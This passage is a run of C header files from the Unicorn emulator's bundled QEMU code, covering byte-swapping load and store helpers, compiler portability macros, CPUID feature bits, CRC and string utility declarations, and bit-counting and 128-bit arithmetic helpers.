uint16_t v) { stw_he_p(ptr, le_bswap(v, 16)); } static inline void stl_le_p(void *ptr, uint32_t v) { stl_he_p(ptr, le_bswap(v, 32)); } static inline void stq_le_p(void *ptr, uint64_t v) { stq_he_p(ptr, le_bswap(v, 64)); } /* float access */ static inline float32 ldfl_le_p(const void *ptr) { CPU_FloatU u; u.l = ldl_le_p(ptr); return u.f; } static inline void stfl_le_p(void *ptr, float32 v) { CPU_FloatU u; u.f = v; stl_le_p(ptr, u.l); } static inline float64 ldfq_le_p(const void *ptr) { CPU_DoubleU u; u.ll = ldq_le_p(ptr); return u.d; } static inline void stfq_le_p(void *ptr, float64 v) { CPU_DoubleU u; u.d = v; stq_le_p(ptr, u.ll); } static inline int lduw_be_p(const void *ptr) { return (uint16_t)be_bswap(lduw_he_p(ptr), 16); } static inline int ldsw_be_p(const void *ptr) { return (int16_t)be_bswap(lduw_he_p(ptr), 16); } static inline int ldl_be_p(const void *ptr) { return be_bswap(ldl_he_p(ptr), 32); } static inline uint64_t ldq_be_p(const void *ptr) { return be_bswap(ldq_he_p(ptr), 64); } static inline void stw_be_p(void *ptr, uint16_t v) { stw_he_p(ptr, be_bswap(v, 16)); } static inline void stl_be_p(void *ptr, uint32_t v) { stl_he_p(ptr, be_bswap(v, 32)); } static inline void stq_be_p(void *ptr, uint64_t v) { stq_he_p(ptr, be_bswap(v, 64)); } /* float access */ static inline float32 ldfl_be_p(const void *ptr) { CPU_FloatU u; u.l = ldl_be_p(ptr); return u.f; } static 
inline void stfl_be_p(void *ptr, float32 v) { CPU_FloatU u; u.f = v; stl_be_p(ptr, u.l); } static inline float64 ldfq_be_p(const void *ptr) { CPU_DoubleU u; u.ll = ldq_be_p(ptr); return u.d; } static inline void stfq_be_p(void *ptr, float64 v) { CPU_DoubleU u; u.d = v; stq_be_p(ptr, u.ll); } static inline unsigned long leul_to_cpu(unsigned long v) { #if HOST_LONG_BITS == 32 return le_bswap(v, 32); #elif HOST_LONG_BITS == 64 return le_bswap(v, 64); #else # error Unknown sizeof long #endif } /* Store v to p as a sz byte value in host order */ #define DO_STN_LDN_P(END) \ static inline void stn_## END ## _p(void *ptr, int sz, uint64_t v) \ { \ switch (sz) { \ case 1: \ stb_p(ptr, v); \ break; \ case 2: \ stw_ ## END ## _p(ptr, v); \ break; \ case 4: \ stl_ ## END ## _p(ptr, v); \ break; \ case 8: \ stq_ ## END ## _p(ptr, v); \ break; \ default: \ break; /* g_assert_not_reached(); */ \ } \ } \ static inline uint64_t ldn_## END ## _p(const void *ptr, int sz) \ { \ switch (sz) { \ case 1: \ return ldub_p(ptr); \ case 2: \ return lduw_ ## END ## _p(ptr); \ case 4: \ return (uint32_t)ldl_ ## END ## _p(ptr); \ case 8: \ return ldq_ ## END ## _p(ptr); \ default: \ return 0; /* g_assert_not_reached(); */ \ } \ } DO_STN_LDN_P(he) DO_STN_LDN_P(le) DO_STN_LDN_P(be) #undef DO_STN_LDN_P #undef le_bswap #undef be_bswap #undef le_bswaps #undef be_bswaps #endif /* BSWAP_H */

unicorn-2.1.1/qemu/include/qemu/compiler.h

/* compiler.h: macros to abstract away compiler specifics * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #ifndef COMPILER_H #define COMPILER_H #include "unicorn/platform.h" #ifndef glue #define xglue(x, y) x ## y #define glue(x, y) xglue(x, y) #define stringify(s) tostring(s) #define tostring(s) #s #endif #ifdef _MSC_VER // MSVC support #define inline __inline #define __func__ __FUNCTION__ #include <math.h> #include <float.h> #if _MSC_VER < MSC_VER_VS2013 #define isinf(x) (!_finite(x)) #if defined(_WIN64) #define isnan _isnanf #else #define isnan _isnan #endif #endif /* gcc __builtin___clear_cache() */ static inline void __builtin___clear_cache(void *beg, void *e) { unsigned char *start = beg; unsigned char *end = e; FlushInstructionCache(GetCurrentProcess(), start, end - start); } static inline double rint( double x ) { return floor(x < 0 ?
x - 0.5 : x + 0.5); } union MSVC_FLOAT_HACK { unsigned char Bytes[4]; float Value; }; #ifndef NAN static union MSVC_FLOAT_HACK __NAN = {{0x00, 0x00, 0xC0, 0x7F}}; #define NAN (__NAN.Value) #endif #define QEMU_DIV0 __pragma(warning(suppress:2124)) // divide by zero error #define QEMU_GNUC_PREREQ(maj, min) 0 #define QEMU_NORETURN __declspec(noreturn) #define QEMU_UNUSED_VAR __pragma(warning(suppress:4100)) // unused variables only #define QEMU_UNUSED_FUNC #define QEMU_WARN_UNUSED_RESULT #define QEMU_ARTIFICIAL #define QEMU_PACK( __Declaration__ ) __pragma( pack(push, 1) ) __Declaration__ __pragma( pack(pop) ) #define QEMU_NOINLINE __declspec(noinline) #define QEMU_ALIGN(A, B) __declspec(align(A)) B #define QEMU_ALIGNED(X) #define cat(x,y) x ## y #define cat2(x,y) cat(x,y) #define QEMU_BUILD_BUG_ON(x) #define QEMU_BUILD_BUG_ON_ZERO(x) #define QEMU_BUILD_BUG_MSG(x, msg) #define GCC_FMT_ATTR(n, m) #define likely(x) (x) #define unlikely(x) (x) #define container_of(ptr, type, member) ((type *)((char *)(ptr) - offsetof(type, member))) #define QEMU_FLATTEN #define QEMU_ALWAYS_INLINE __declspec(inline) #else // Unix compilers #ifndef NAN #define NAN (0.0 / 0.0) #endif #if defined __clang_analyzer__ || defined __COVERITY__ #define QEMU_STATIC_ANALYSIS 1 #endif /*---------------------------------------------------------------------------- | The macro QEMU_GNUC_PREREQ tests for minimum version of the GNU C compiler. | The code is a copy of SOFTFLOAT_GNUC_PREREQ, see softfloat-macros.h. *----------------------------------------------------------------------------*/ #if defined(__GNUC__) && defined(__GNUC_MINOR__) # define QEMU_GNUC_PREREQ(maj, min) \ ((__GNUC__ << 16) + __GNUC_MINOR__ >= ((maj) << 16) + (min)) #else # define QEMU_GNUC_PREREQ(maj, min) 0 #endif #define QEMU_NORETURN __attribute__ ((__noreturn__)) #define QEMU_UNUSED_VAR __attribute__((unused)) #define QEMU_UNUSED_FUNC __attribute__((unused)) #define QEMU_WARN_UNUSED_RESULT __attribute__((warn_unused_result)) #define QEMU_SENTINEL __attribute__((sentinel)) #if defined(_WIN32) && (defined(__x86_64__) || defined(__i386__)) # define QEMU_PACKED __attribute__((gcc_struct, packed)) # define QEMU_PACK( __Declaration__ ) __Declaration__ __attribute__((gcc_struct, packed)) #else # define QEMU_PACKED __attribute__((packed)) # define QEMU_PACK( __Declaration__ ) __Declaration__ __attribute__((packed)) #endif #define QEMU_ALIGN(A, B) B __attribute__((aligned(A))) #define QEMU_ALIGNED(X) __attribute__((aligned(X))) #define QEMU_NOINLINE __attribute__((noinline)) #ifndef likely #if __GNUC__ < 3 #define __builtin_expect(x, n) (x) #endif #define likely(x) __builtin_expect(!!(x), 1) #define unlikely(x) __builtin_expect(!!(x), 0) #endif #ifndef container_of #define container_of(ptr, type, member) ({ \ const typeof(((type *) 0)->member) *__mptr = (ptr); \ (type *) ((char *) __mptr - offsetof(type, member));}) #endif #define sizeof_field(type, field) sizeof(((type *)0)->field) /* * Calculate the number of bytes up to and including the given 'field' of * 'container'. */ #define endof(container, field) \ (offsetof(container, field) + sizeof_field(container, field)) /* Convert from a base type to a parent type, with compile time checking. 
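 * (Illustrative example, not from the original header; 'DeviceState' and
 * 'MyDevice' are hypothetical types:
 *
 *   typedef struct MyDevice { DeviceState parent_obj; int level; } MyDevice;
 *   MyDevice *md = DO_UPCAST(MyDevice, parent_obj, dev);
 *
 * The negative-size-array trick below fails the build unless 'parent_obj'
 * is the first member, i.e. offsetof(MyDevice, parent_obj) == 0.)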
*/ #ifdef __GNUC__ #define DO_UPCAST(type, field, dev) ( __extension__ ( { \ char __attribute__((unused)) offset_must_be_zero[ \ -offsetof(type, field)]; \ container_of(dev, type, field);})) #else #define DO_UPCAST(type, field, dev) container_of(dev, type, field) #endif #define typeof_field(type, field) typeof(((type *)0)->field) #define type_check(t1,t2) ((t1*)0 - (t2*)0) #define QEMU_BUILD_BUG_ON_STRUCT(x) \ struct { \ int:(x) ? -1 : 1; \ } /* QEMU_BUILD_BUG_MSG() emits the message given if _Static_assert is * supported; otherwise, it will be omitted from the compiler error * message (but as it remains present in the source code, it can still * be useful when debugging). */ #if defined(CONFIG_STATIC_ASSERT) #define QEMU_BUILD_BUG_MSG(x, msg) _Static_assert(!(x), msg) #elif defined(__COUNTER__) #define QEMU_BUILD_BUG_MSG(x, msg) typedef QEMU_BUILD_BUG_ON_STRUCT(x) \ glue(qemu_build_bug_on__, __COUNTER__) __attribute__((unused)) #else #define QEMU_BUILD_BUG_MSG(x, msg) #endif #define QEMU_BUILD_BUG_ON(x) QEMU_BUILD_BUG_MSG(x, "not expecting: " #x) #define QEMU_BUILD_BUG_ON_ZERO(x) (sizeof(QEMU_BUILD_BUG_ON_STRUCT(x)) - \ sizeof(QEMU_BUILD_BUG_ON_STRUCT(x))) #if defined __GNUC__ # if !QEMU_GNUC_PREREQ(4, 4) /* gcc versions before 4.4.x don't support gnu_printf, so use printf. */ # define GCC_FMT_ATTR(n, m) __attribute__((format(printf, n, m))) # else /* Use gnu_printf when supported (qemu uses standard format strings). */ # define GCC_FMT_ATTR(n, m) __attribute__((format(gnu_printf, n, m))) # if defined(_WIN32) /* Map __printf__ to __gnu_printf__ because we want standard format strings * even when MinGW or GLib include files use __printf__. */ # define __printf__ __gnu_printf__ # endif # endif #else #define GCC_FMT_ATTR(n, m) #endif #ifndef __has_warning #define __has_warning(x) 0 /* compatibility with non-clang compilers */ #endif #ifndef __has_feature #define __has_feature(x) 0 /* compatibility with non-clang compilers */ #endif #ifndef __has_builtin #define __has_builtin(x) 0 /* compatibility with non-clang compilers */ #endif #if __has_builtin(__builtin_assume_aligned) || !defined(__clang__) #define HAS_ASSUME_ALIGNED #endif #ifndef __has_attribute #define __has_attribute(x) 0 /* compatibility with older GCC */ #endif /* * GCC doesn't provide __has_attribute() until GCC 5, but we know all the GCC * versions we support have the "flatten" attribute. Clang may not have the * "flatten" attribute but always has __has_attribute() to check for it. */ #if __has_attribute(flatten) || !defined(__clang__) # define QEMU_FLATTEN __attribute__((flatten)) #else # define QEMU_FLATTEN #endif /* * If __attribute__((error)) is present, use it to produce an error at * compile time. Otherwise, one must wait for the linker to diagnose * the missing symbol. */ #if __has_attribute(error) # define QEMU_ERROR(X) __attribute__((error(X))) #else # define QEMU_ERROR(X) #endif /* * The nonstring variable attribute specifies that an object or member * declaration with type array of char or pointer to char is intended * to store character arrays that do not necessarily contain a terminating * NUL character. This is useful in detecting uses of such arrays or pointers * with functions that expect NUL-terminated strings, and to avoid warnings * when such an array or pointer is used as an argument to a bounded string * manipulation function such as strncpy. 
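 *
 * (Illustrative example, not from the original header:
 *
 *   struct hdr { char tag[4] QEMU_NONSTRING; };   // e.g. "RIFF", no NUL
 *   strncpy(h->tag, "RIFF", sizeof(h->tag));      // no truncation warning
 *
 * Without the attribute, GCC 8+ may emit -Wstringop-truncation here.)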
*/ #if __has_attribute(nonstring) # define QEMU_NONSTRING __attribute__((nonstring)) #else # define QEMU_NONSTRING #endif /* * Forced inlining may be desired to encourage constant propagation * of function parameters. However, it can also make debugging harder, * so disable it for a non-optimizing build. */ #if defined(__OPTIMIZE__) #define QEMU_ALWAYS_INLINE __attribute__((always_inline)) #else #define QEMU_ALWAYS_INLINE #endif /* Implement C11 _Generic via GCC builtins. Example: * * QEMU_GENERIC(x, (float, sinf), (long double, sinl), sin) (x) * * The first argument is the discriminator. The last is the default value. * The middle ones are tuples in "(type, expansion)" format. */ /* First, find out the number of generic cases. */ #define QEMU_GENERIC(x, ...) \ QEMU_GENERIC_(typeof(x), __VA_ARGS__, 10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0) /* There will be extra arguments, but they are not used. */ #define QEMU_GENERIC_(x, a0, a1, a2, a3, a4, a5, a6, a7, a8, a9, count, ...) \ QEMU_GENERIC##count(x, a0, a1, a2, a3, a4, a5, a6, a7, a8, a9) /* Two more helper macros, this time to extract items from a parenthesized * list. */ #define QEMU_FIRST_(a, b) a #define QEMU_SECOND_(a, b) b /* ... and a final one for the common part of the "recursion". */ #define QEMU_GENERIC_IF(x, type_then, else_) \ __builtin_choose_expr(__builtin_types_compatible_p(x, \ QEMU_FIRST_ type_then), \ QEMU_SECOND_ type_then, else_) /* CPP poor man's "recursion". */ #define QEMU_GENERIC1(x, a0, ...) (a0) #define QEMU_GENERIC2(x, a0, ...) QEMU_GENERIC_IF(x, a0, QEMU_GENERIC1(x, __VA_ARGS__)) #define QEMU_GENERIC3(x, a0, ...) QEMU_GENERIC_IF(x, a0, QEMU_GENERIC2(x, __VA_ARGS__)) #define QEMU_GENERIC4(x, a0, ...) QEMU_GENERIC_IF(x, a0, QEMU_GENERIC3(x, __VA_ARGS__)) #define QEMU_GENERIC5(x, a0, ...) QEMU_GENERIC_IF(x, a0, QEMU_GENERIC4(x, __VA_ARGS__)) #define QEMU_GENERIC6(x, a0, ...) QEMU_GENERIC_IF(x, a0, QEMU_GENERIC5(x, __VA_ARGS__)) #define QEMU_GENERIC7(x, a0, ...) QEMU_GENERIC_IF(x, a0, QEMU_GENERIC6(x, __VA_ARGS__)) #define QEMU_GENERIC8(x, a0, ...) QEMU_GENERIC_IF(x, a0, QEMU_GENERIC7(x, __VA_ARGS__)) #define QEMU_GENERIC9(x, a0, ...) QEMU_GENERIC_IF(x, a0, QEMU_GENERIC8(x, __VA_ARGS__)) #define QEMU_GENERIC10(x, a0, ...) QEMU_GENERIC_IF(x, a0, QEMU_GENERIC9(x, __VA_ARGS__)) /** * qemu_build_not_reached() * * The compiler, during optimization, is expected to prove that a call * to this function cannot be reached and remove it. If the compiler * supports QEMU_ERROR, this will be reported at compile time; otherwise * this will be reported at link time due to the missing symbol. 
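 *
 * (Illustrative example, not from the original header; 'size' must be a
 * compile-time constant for the dead arm to be provably unreachable:
 *
 *   switch (size) {
 *   case 1: return ldub_p(p);
 *   case 2: return lduw_le_p(p);
 *   default: qemu_build_not_reached();
 *   }
 *
 * If the optimizer cannot eliminate the default arm, the build fails
 * instead of silently keeping the path.)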
*/ #if defined(__OPTIMIZE__) && !defined(__NO_INLINE__) extern void QEMU_NORETURN QEMU_ERROR("code path is reachable") qemu_build_not_reached(void); #else #define qemu_build_not_reached() g_assert_not_reached() #endif #endif // _MSC_VER #endif /* COMPILER_H */

unicorn-2.1.1/qemu/include/qemu/cpuid.h

/* cpuid.h: Macros to identify the properties of an x86 host. * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #ifndef QEMU_CPUID_H #define QEMU_CPUID_H #ifndef CONFIG_CPUID_H # error "<cpuid.h> is unusable with this compiler" #endif #ifdef _MSC_VER #include <intrin.h> #else #include <cpuid.h> #endif /* Cover the uses that we have within qemu. */ /* ??? Irritating that we have the same information in target/i386/. */ /* Leaf 1, %edx */ #ifndef bit_CMOV #define bit_CMOV (1 << 15) #endif #ifndef bit_SSE2 #define bit_SSE2 (1 << 26) #endif /* Leaf 1, %ecx */ #ifndef bit_POPCNT #define bit_POPCNT (1 << 23) #endif #ifndef bit_SSE4_1 #define bit_SSE4_1 (1 << 19) #endif #ifndef bit_MOVBE #define bit_MOVBE (1 << 22) #endif #ifndef bit_OSXSAVE #define bit_OSXSAVE (1 << 27) #endif #ifndef bit_AVX #define bit_AVX (1 << 28) #endif /* Leaf 7, %ebx */ #ifndef bit_BMI #define bit_BMI (1 << 3) #endif #ifndef bit_AVX2 #define bit_AVX2 (1 << 5) #endif #ifndef bit_AVX512F #define bit_AVX512F (1 << 16) #endif #ifndef bit_BMI2 #define bit_BMI2 (1 << 8) #endif /* Leaf 0x80000001, %ecx */ #ifndef bit_LZCNT #define bit_LZCNT (1 << 5) #endif #endif /* QEMU_CPUID_H */

unicorn-2.1.1/qemu/include/qemu/crc32c.h

/* * Castagnoli CRC32C Checksum Algorithm * * Polynomial: 0x11EDC6F41 * * Castagnoli93: Guy Castagnoli and Stefan Braeuer and Martin Herrman * "Optimization of Cyclic Redundancy-Check Codes with 24 * and 32 Parity Bits", IEEE Transactions on Communication, * Volume 41, Number 6, June 1993 * * Copyright (c) 2013 Red Hat, Inc., * * Authors: * Jeff Cody <jcody@redhat.com> * * Based on the Linux kernel cryptographic
crc32c module, * * Copyright (c) 2004 Cisco Systems, Inc. * Copyright (c) 2008 Herbert Xu <herbert@gondor.apana.org.au> * * This program is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License as published by the Free * Software Foundation; either version 2 of the License, or (at your option) * any later version. * */ #ifndef QEMU_CRC32C_H #define QEMU_CRC32C_H uint32_t crc32c(uint32_t crc, const uint8_t *data, unsigned int length); uint32_t crc32(uint32_t crc, const uint8_t *data, unsigned int length); #endif

unicorn-2.1.1/qemu/include/qemu/ctype.h

/* * QEMU TCG support * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #ifndef QEMU_CTYPE_H #define QEMU_CTYPE_H #define qemu_isalnum(c) isalnum((unsigned char)(c)) #define qemu_isalpha(c) isalpha((unsigned char)(c)) #define qemu_iscntrl(c) iscntrl((unsigned char)(c)) #define qemu_isdigit(c) isdigit((unsigned char)(c)) #define qemu_isgraph(c) isgraph((unsigned char)(c)) #define qemu_islower(c) islower((unsigned char)(c)) #define qemu_isprint(c) isprint((unsigned char)(c)) #define qemu_ispunct(c) ispunct((unsigned char)(c)) #define qemu_isspace(c) isspace((unsigned char)(c)) #define qemu_isupper(c) isupper((unsigned char)(c)) #define qemu_isxdigit(c) isxdigit((unsigned char)(c)) #define qemu_tolower(c) tolower((unsigned char)(c)) #define qemu_toupper(c) toupper((unsigned char)(c)) #define qemu_isascii(c) isascii((unsigned char)(c)) #define qemu_toascii(c) toascii((unsigned char)(c)) #endif

unicorn-2.1.1/qemu/include/qemu/cutils.h

#ifndef QEMU_CUTILS_H #define QEMU_CUTILS_H /** * pstrcpy: * @buf: buffer to copy
string into * @buf_size: size of @buf in bytes * @str: string to copy * * Copy @str into @buf, including the trailing NUL, but do not * write more than @buf_size bytes. The resulting buffer is * always NUL terminated (even if the source string was too long). * If @buf_size is zero or negative then no bytes are copied. * * This function is similar to strncpy(), but avoids two of that * function's problems: * * if @str fits in the buffer, pstrcpy() does not zero-fill the * remaining space at the end of @buf * * if @str is too long, pstrcpy() will copy the first @buf_size-1 * bytes and then add a NUL */ void pstrcpy(char *buf, int buf_size, const char *str); /** * pstrcat: * @buf: buffer containing existing string * @buf_size: size of @buf in bytes * @s: string to concatenate to @buf * * Append a copy of @s to the string already in @buf, but do not * allow the buffer to overflow. If the existing contents of @buf * plus @s would total more than @buf_size bytes, then write * as much of @s as will fit followed by a NUL terminator. * * @buf must already contain a NUL-terminated string, or the * behaviour is undefined. * * Returns: @buf. */ char *pstrcat(char *buf, int buf_size, const char *s); #endif

unicorn-2.1.1/qemu/include/qemu/guest-random.h

/* * QEMU guest-visible random functions * * Copyright 2019 Linaro, Ltd. * * This program is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License as published by the Free * Software Foundation; either version 2 of the License, or (at your option) * any later version. */ #ifndef QEMU_GUEST_RANDOM_H #define QEMU_GUEST_RANDOM_H /** * qemu_guest_random_seed_thread_part1(void) * * If qemu_guest_getrandom is in deterministic mode, returns an * independent seed for the new thread. Otherwise returns 0. */ uint64_t qemu_guest_random_seed_thread_part1(void); /** * qemu_guest_random_seed_thread_part2(uint64_t seed) * @seed: a value for the new thread. * * If qemu_guest_getrandom is in deterministic mode, this stores an * independent seed for the new thread. Otherwise a no-op. */ void qemu_guest_random_seed_thread_part2(uint64_t seed); /** * qemu_guest_getrandom(void *buf, size_t len) * @buf: a buffer of bytes to be written * @len: the number of bytes in @buf * * Fills len bytes in buf with random data. This should only be used * for data presented to the guest. Host-side crypto services should * use qcrypto_random_bytes. * * Returns 0 on success, < 0 on failure. */ int qemu_guest_getrandom(void *buf, size_t len); /** * qemu_guest_getrandom_nofail(void *buf, size_t len) * @buf: a buffer of bytes to be written * @len: the number of bytes in @buf * * Like qemu_guest_getrandom, but will assert for failure. * Use this when there is no reasonable recovery.
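 *
 * (Illustrative example, not from the original header: filling a
 * guest-visible 16-byte nonce where failure has no sensible recovery.)
 *
 *   uint8_t nonce[16];
 *   qemu_guest_getrandom_nofail(nonce, sizeof(nonce));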
*/ void qemu_guest_getrandom_nofail(void *buf, size_t len); #endif /* QEMU_GUEST_RANDOM_H */

unicorn-2.1.1/qemu/include/qemu/host-utils.h

/* * Utility compute operations used by translated code. * * Copyright (c) 2007 Thiemo Seufer * Copyright (c) 2007 Jocelyn Mayer * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE.
*/ #ifndef HOST_UTILS_H #define HOST_UTILS_H #include "qemu/bswap.h" #include "qemu/int128.h" #ifdef CONFIG_INT128 static inline void mulu64(uint64_t *plow, uint64_t *phigh, uint64_t a, uint64_t b) { __uint128_t r = (__uint128_t)a * b; *plow = r; *phigh = r >> 64; } static inline void muls64(uint64_t *plow, uint64_t *phigh, int64_t a, int64_t b) { __int128_t r = (__int128_t)a * b; *plow = r; *phigh = r >> 64; } /* compute with 96 bit intermediate result: (a*b)/c */ static inline uint64_t muldiv64(uint64_t a, uint32_t b, uint32_t c) { #if defined(_MSC_VER) && defined(__clang__) union { uint64_t ll; struct { #ifdef HOST_WORDS_BIGENDIAN uint32_t high, low; #else uint32_t low, high; #endif } l; } u, res; uint64_t rl, rh; u.ll = a; rl = (uint64_t)u.l.low * (uint64_t)b; rh = (uint64_t)u.l.high * (uint64_t)b; rh += (rl >> 32); res.l.high = rh / c; res.l.low = (((rh % c) << 32) + (rl & 0xffffffff)) / c; return res.ll; #else return (__int128_t)a * b / c; #endif } static inline int divu128(uint64_t *plow, uint64_t *phigh, uint64_t divisor) { if (divisor == 0) { return 1; } else { __uint128_t dividend = ((__uint128_t)*phigh << 64) | *plow; __uint128_t result = dividend / divisor; *plow = result; *phigh = dividend % divisor; return result > UINT64_MAX; } } static inline int divs128(int64_t *plow, int64_t *phigh, int64_t divisor) { if (divisor == 0) { return 1; } else { __int128_t dividend = ((__int128_t)*phigh << 64) | *plow; __int128_t result = dividend / divisor; *plow = result; *phigh = dividend % divisor; return result != *plow; } } #else void muls64(uint64_t *phigh, uint64_t *plow, int64_t a, int64_t b); void mulu64(uint64_t *phigh, uint64_t *plow, uint64_t a, uint64_t b); int divu128(uint64_t *plow, uint64_t *phigh, uint64_t divisor); int divs128(int64_t *plow, int64_t *phigh, int64_t divisor); static inline uint64_t muldiv64(uint64_t a, uint32_t b, uint32_t c) { union { uint64_t ll; struct { #ifdef HOST_WORDS_BIGENDIAN uint32_t high, low; #else uint32_t low, high; #endif } l; } u, res; uint64_t rl, rh; u.ll = a; rl = (uint64_t)u.l.low * (uint64_t)b; rh = (uint64_t)u.l.high * (uint64_t)b; rh += (rl >> 32); res.l.high = rh / c; res.l.low = (((rh % c) << 32) + (rl & 0xffffffff)) / c; return res.ll; } #endif /** * clz32 - count leading zeros in a 32-bit value. * @val: The value to search * * Returns 32 if the value is zero. Note that the GCC builtin is * undefined if the value is zero. */ static inline int clz32(uint32_t val) { #ifndef _MSC_VER return val ? __builtin_clz(val) : 32; #else /* Binary search for the leading one bit. */ int cnt = 0; if (!(val & 0xFFFF0000U)) { cnt += 16; val <<= 16; } if (!(val & 0xFF000000U)) { cnt += 8; val <<= 8; } if (!(val & 0xF0000000U)) { cnt += 4; val <<= 4; } if (!(val & 0xC0000000U)) { cnt += 2; val <<= 2; } if (!(val & 0x80000000U)) { cnt++; val <<= 1; } if (!(val & 0x80000000U)) { cnt++; } return cnt; #endif } /** * clo32 - count leading ones in a 32-bit value. * @val: The value to search * * Returns 32 if the value is -1. */ static inline int clo32(uint32_t val) { return clz32(~val); } /** * clz64 - count leading zeros in a 64-bit value. * @val: The value to search * * Returns 64 if the value is zero. Note that the GCC builtin is * undefined if the value is zero. */ static inline int clz64(uint64_t val) { #ifndef _MSC_VER return val ? __builtin_clzll(val) : 64; #else int cnt = 0; if (!(val >> 32)) { cnt += 32; } else { val >>= 32; } return cnt + clz32((uint32_t)val); #endif } /** * clo64 - count leading ones in a 64-bit value. 
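 * (Illustrative note, not from the original header: e.g.
 * clo64(0xfff0000000000000ull) == 12 and clo64(~0ull) == 64.)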
* @val: The value to search * * Returns 64 if the value is -1. */ static inline int clo64(uint64_t val) { return clz64(~val); } /** * ctz32 - count trailing zeros in a 32-bit value. * @val: The value to search * * Returns 32 if the value is zero. Note that the GCC builtin is * undefined if the value is zero. */ static inline int ctz32(uint32_t val) { #ifndef _MSC_VER return val ? __builtin_ctz(val) : 32; #else /* Binary search for the trailing one bit. */ int cnt; cnt = 0; if (!(val & 0x0000FFFFUL)) { cnt += 16; val >>= 16; } if (!(val & 0x000000FFUL)) { cnt += 8; val >>= 8; } if (!(val & 0x0000000FUL)) { cnt += 4; val >>= 4; } if (!(val & 0x00000003UL)) { cnt += 2; val >>= 2; } if (!(val & 0x00000001UL)) { cnt++; val >>= 1; } if (!(val & 0x00000001UL)) { cnt++; } return cnt; #endif } /** * cto32 - count trailing ones in a 32-bit value. * @val: The value to search * * Returns 32 if the value is -1. */ static inline int cto32(uint32_t val) { return ctz32(~val); } /** * ctz64 - count trailing zeros in a 64-bit value. * @val: The value to search * * Returns 64 if the value is zero. Note that the GCC builtin is * undefined if the value is zero. */ static inline int ctz64(uint64_t val) { #ifndef _MSC_VER return val ? __builtin_ctzll(val) : 64; #else int cnt; cnt = 0; if (!((uint32_t)val)) { cnt += 32; val >>= 32; } return cnt + ctz32((uint32_t)val); #endif } /** * cto64 - count trailing ones in a 64-bit value. * @val: The value to search * * Returns 64 if the value is -1. */ static inline int cto64(uint64_t val) { return ctz64(~val); } /** * clrsb32 - count leading redundant sign bits in a 32-bit value. * @val: The value to search * * Returns the number of bits following the sign bit that are equal to it. * No special cases; output range is [0-31]. */ static inline int clrsb32(uint32_t val) { #if !defined(_MSC_VER) && !defined(__clang__) return __builtin_clrsb(val); #else return clz32(val ^ ((int32_t)val >> 1)) - 1; #endif } /** * clrsb64 - count leading redundant sign bits in a 64-bit value. * @val: The value to search * * Returns the number of bits following the sign bit that are equal to it. * No special cases; output range is [0-63]. */ static inline int clrsb64(uint64_t val) { #if !defined(_MSC_VER) && !defined(__clang__) return __builtin_clrsbll(val); #else return clz64(val ^ ((int64_t)val >> 1)) - 1; #endif } /** * ctpop8 - count the population of one bits in an 8-bit value. * @val: The value to search */ static inline int ctpop8(uint8_t val) { #ifndef _MSC_VER return __builtin_popcount(val); #else val = (val & 0x55) + ((val >> 1) & 0x55); val = (val & 0x33) + ((val >> 2) & 0x33); val = (val & 0x0f) + ((val >> 4) & 0x0f); return val; #endif } /** * ctpop16 - count the population of one bits in a 16-bit value. * @val: The value to search */ static inline int ctpop16(uint16_t val) { #ifndef _MSC_VER return __builtin_popcount(val); #else val = (val & 0x5555) + ((val >> 1) & 0x5555); val = (val & 0x3333) + ((val >> 2) & 0x3333); val = (val & 0x0f0f) + ((val >> 4) & 0x0f0f); val = (val & 0x00ff) + ((val >> 8) & 0x00ff); return val; #endif } /** * ctpop32 - count the population of one bits in a 32-bit value. 
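 * (Illustrative note, not from the original header: e.g.
 * ctpop32(0xf0f0f0f0) == 16 and ctpop32(7) == 3.)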
* @val: The value to search */ static inline int ctpop32(uint32_t val) { #ifndef _MSC_VER return __builtin_popcount(val); #else val = (val & 0x55555555) + ((val >> 1) & 0x55555555); val = (val & 0x33333333) + ((val >> 2) & 0x33333333); val = (val & 0x0f0f0f0f) + ((val >> 4) & 0x0f0f0f0f); val = (val & 0x00ff00ff) + ((val >> 8) & 0x00ff00ff); val = (val & 0x0000ffff) + ((val >> 16) & 0x0000ffff); return val; #endif } /** * ctpop64 - count the population of one bits in a 64-bit value. * @val: The value to search */ static inline int ctpop64(uint64_t val) { #ifndef _MSC_VER return __builtin_popcountll(val); #else val = (val & 0x5555555555555555ULL) + ((val >> 1) & 0x5555555555555555ULL); val = (val & 0x3333333333333333ULL) + ((val >> 2) & 0x3333333333333333ULL); val = (val & 0x0f0f0f0f0f0f0f0fULL) + ((val >> 4) & 0x0f0f0f0f0f0f0f0fULL); val = (val & 0x00ff00ff00ff00ffULL) + ((val >> 8) & 0x00ff00ff00ff00ffULL); val = (val & 0x0000ffff0000ffffULL) + ((val >> 16) & 0x0000ffff0000ffffULL); val = (val & 0x00000000ffffffffULL) + ((val >> 32) & 0x00000000ffffffffULL); return (int)val; #endif } /** * revbit8 - reverse the bits in an 8-bit value. * @x: The value to modify. */ static inline uint8_t revbit8(uint8_t x) { /* Assign the correct nibble position. */ x = ((x & 0xf0) >> 4) | ((x & 0x0f) << 4); /* Assign the correct bit position. */ x = ((x & 0x88) >> 3) | ((x & 0x44) >> 1) | ((x & 0x22) << 1) | ((x & 0x11) << 3); return x; } /** * revbit16 - reverse the bits in a 16-bit value. * 